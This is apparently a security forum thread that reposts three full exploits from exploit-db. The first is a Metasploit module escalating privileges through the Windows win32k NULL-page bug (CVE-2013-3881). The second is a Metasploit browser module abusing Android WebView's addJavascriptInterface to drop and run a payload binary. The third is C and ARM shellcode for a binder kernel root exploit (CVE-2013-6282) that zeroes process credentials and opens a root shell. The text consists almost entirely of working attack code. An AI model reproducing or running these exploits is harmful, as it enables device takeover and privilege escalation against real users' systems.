    [h=1]Windows TrackPopupMenuEx Win32k NULL Page[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'Windows TrackPopupMenuEx Win32k NULL Page', 'Description' => %q{ This module exploits a vulnerability in win32k.sys where under specific conditions TrackPopupMenuEx will pass a NULL pointer to the MNEndMenuState procedure. This module has been tested successfully on Windows 7 SP0 and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Seth Gibson', # vulnerability discovery 'Dan Zentner', # vulnerability discovery 'Matias Soler', # vulnerability analysis 'Spencer McIntyre' ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows 7 SP0/SP1', { } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ [ 'CVE', '2013-3881' ], [ 'OSVDB', '98212' ], [ 'BID', '62830'], [ 'MSB', 'MS13-081' ], [ 'URL', 'http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html' ], [ 'URL', 'http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html' ] ], 'DisclosureDate' => 'Oct 08 2013', 'DefaultTarget' => 0 })) end def check os = sysinfo["OS"] if (os =~ /windows/i) == nil return Exploit::CheckCode::Unknown end file_path = expand_path("%windir%") << "\\system32\\win32k.sys" major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") case build when 7600 return Exploit::CheckCode::Vulnerable when 7601 return Exploit::CheckCode::Vulnerable if revision <= 18126 when 9200 return Exploit::CheckCode::Safe end return Exploit::CheckCode::Unknown end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end if check != Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") end if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end print_status("Launching notepad to host the exploit...") notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true}) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Reader Sandbox won't allow to create a new process: # stdapi_sys_process_execute: Operation failed: Access is denied. print_status("Operation failed. Trying to elevate the current process...") process = client.sys.process.open end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-3881", "cve-2013-3881.x86.dll") library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status("Payload injected. Executing exploit...") process.thread.create(exploit_mem + offset, payload_mem) print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.") end end Sursa: Windows TrackPopupMenuEx Win32k NULL Page
  24. Nytro
    [h=1]Android Browser and WebView addJavascriptInterface Code Execution[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_flavor => "Android", :arch => ARCH_ARMLE, :javascript => true, :rank => ExcellentRanking, :vuln_test => %Q| for (i in top) { try { top[i].getClass().forName('java.lang.Runtime'); is_vuln = true; break; } catch(e) {} } | }) def initialize(info = {}) super(update_info(info, 'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution', 'Description' => %q{ This module exploits a privilege escalation issue in Android < 4.2's WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection APIs exposed by the Interface and execute arbitrary commands. Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs 4.1.2 release of Android is known to be vulnerable. A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here. If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS into the page displayed in the WebView, then you can inject the html/js served by this module and get a shell. Note: Adding a .js to the URL will return plain javascript (no HTML markup). }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck', # original msf module 'joev' # static server ], 'References' => [ ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-'+ 'addjavascriptinterface-code-execution-vulnerability/'], ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'], ['URL', 'http://50.56.33.56/blog/?p=314'], ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+ 'addjavascriptinterface-remote-code-execution/'] ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'DefaultOptions' => { 'PrependFork' => true }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Dec 21 2012', 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :os_flavor => "Android", :arch => ARCH_ARMLE } )) end def on_request_uri(cli, req) if req.uri.end_with?('js') print_status("Serving javascript") send_response(cli, js, 'Content-type' => 'text/javascript') else super end end def on_request_exploit(cli, req, browser) print_status("Serving exploit HTML") send_response_html(cli, html) end def js %Q| function exec(obj) { // ensure that the object contains a native interface try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}"; // get the process name, which will give us our data path var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } path += '/#{Rex::Text.rand_text_alpha(8)}'; // build the binary, chmod it, and execute it m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor(); m.invoke(null, null).exec(['chmod', '700', path]).waitFor(); m.invoke(null, null).exec([path]); return true; } for (i in top) { if (exec(top[i]) === true) break; } | end def html "<!doctype html><html><body><script>#{js}</script></body></html>" end end Sursa: http://www.exploit-db.com/exploits/31519/
  25. Nytro
    [h=1]Linux ARM - Local Root Exploit[/h] /* * Just a lame binder local root exploit stub. Somewhat messy but whatever. The bug was reported in CVE-2013-6282. * * Tested on Android 4.2.2 and 4.4. Kernels 3.0.57, 3.4.5 and few more. All up to 3.4.5 unpatched should be vulnerable. * You need to customize the addresses so that they match the target board. On Android, both /proc/kallsyms and dmesg are * restricted, thus no automation here. * * Rigged up by Piotr Szerman. © 2013 * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mman.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> /* Binder transaction request format */ struct binder_write_read { signed long write_size; /* bytes to write */ signed long write_consumed; /* bytes consumed by driver */ unsigned long write_buffer; signed long read_size; /* bytes to read */ signed long read_consumed; /* bytes consumed by driver */ unsigned long read_buffer; } bwr; #define BR_NOOP 0x0000720c /* binder memory write value */ #define SC_TABLE 0xc000ee28 /* system call table address */ /* we need to know the lower halfword of the original address of sys_ni_syscall to tailor MMAP_AREA and MMAP_OFF accordingly. * you can aid yourself with a NOP block. the higher halfword will in any case become 0x720c. on one of my boxes, the other * halfword was 0xdac4. MMAP_AREA must be aligned appropriately. you can extract all the data in question at runtime from * /proc/kallsyms and dmesg (not that hard to set off infoleaks with this bug) as long as there are no contraints in place */ #define MMAP_AREA 0x720cd000 /* userspace landing point page-aligned address. */ #define MMAP_OFF 0xac4 /* offset within it to plant the payload */ #define NUM_PAGES 16 #define PAGE_SIZE 4096 #define NOP 0xe1a00000 /* mov r0, r0 */ #define SHELL "/system/bin/sh" #define TARGET_APERTURE 68 /* aiming for two adjacent non-implemented syscalls. check arch/arm/kernel/calls.S */ #define BINDER_WRITE_READ 0xc0186201 /* printk your BINDER_WRITE_READ */ /* the target payload */ void __attribute__((regparm(3))) shellcode(void) { asm volatile( "__transgressor:;" "push {r0-r12,lr}" "\n\t" "mov r1, sp" "\n\t" /* calculate the process descriptor location */ "bic r2, r1, #8128" "\n\t" "bic r2, r2, #63" "\n\t" "ldr r3, [r2, #12]" "\n\t" "movt r0, #0" "\n\t" "movw r0, #0" "\n\t" "ldr r1, [r3, #492]" "\n\t" /* cred's location may differ depending on the kernel config. * just build and objdump a kernel module with printk(current->cred->uid) * to find out. or pinpoint it with the help of kgdb or whatever */ "mov r4, #8" "\n\t" "__loop_cred:;" "sub r4, r4, #1" "\n\t" "str r0, [r1, #4]!" "\n\t" "teq r4, #0" "\n\t" "bne __loop_cred" "\n\t" "ldr r1, [r3, #488]" "\n\t" /* real_cred. overkill? */ "mov r4, #8" "\n\t" "__loop_real_cred:;" "sub r4, r4, #1" "\n\t" "str r0, [r1, #4]!" "\n\t" "teq r4, #0" "\n\t" "bne __loop_real_cred" "\n\t" "ldm sp!, {r0-r12,pc}" "\n\t" /* return to ret_fast_syscall */ "mov pc, lr" "\n\t" ); } int main(int ac, char **av) { char * const shell[] = { SHELL, NULL }; char *map; int fd; fprintf(stderr, "[!] binder local root exploit\n[!] © piotr szerman\n"); fd = open("/dev/binder", O_RDWR); if(fd < 0) { fprintf(stderr, "[-] failed to reach out for binder. (%s)\n", strerror(errno)); exit(EXIT_FAILURE); } map = mmap((void *)MMAP_AREA, NUM_PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_LOCKED, 0, 0); if(map == (void *)-1) { perror("mmap() "); exit(EXIT_FAILURE); } fprintf(stderr, "[+] userspace map area == 0x%08lx\n", (unsigned long)map); fprintf(stderr, "[+] placing NOP block at 0x%08lx\n", (unsigned long)map); memset(map, NOP, MMAP_OFF); fprintf(stderr, "[+] copying payload to 0x%08lx\n", (unsigned long)map + MMAP_OFF); /* look at the objdump of shellcode to see the correct offset */ memcpy(map + MMAP_OFF, (unsigned char *)shellcode + 8 /* offseting to the __transgressor */, 30 * sizeof(void *) /* copy all opcodes */); fprintf(stderr, "[+] constructing rogue data structure.\n"); bwr.write_size = 0; bwr.write_consumed = 0; bwr.read_size = 1; bwr.read_consumed = 0; /* targeting the aperture between 2 undefined system calls in the table */ bwr.read_buffer = (unsigned long)((unsigned char *)SC_TABLE + TARGET_APERTURE * sizeof(void *) + 2); /* calculate process descriptor address with the aid of sp: * task_struct = *( ((unsigned long *) ( (sp & ~(0xbf000000 - 1)) & ~0x3f )) + 3); */ ioctl(fd, BINDER_WRITE_READ, &bwr); close(fd); sleep(5); /* give binder ample time to service the transaction. if it's under heavy load, the exploit might fail */ fprintf(stderr, "[+] r00ting device...\n\n"); asm volatile( "mov r7, %0\n\t" "swi 0\n\t" : : "I" (TARGET_APERTURE) ); execve(shell[0], shell, NULL); return EXIT_FAILURE; } Sursa: http://www.exploit-db.com/exploits/31574/
×
×
  • Create New...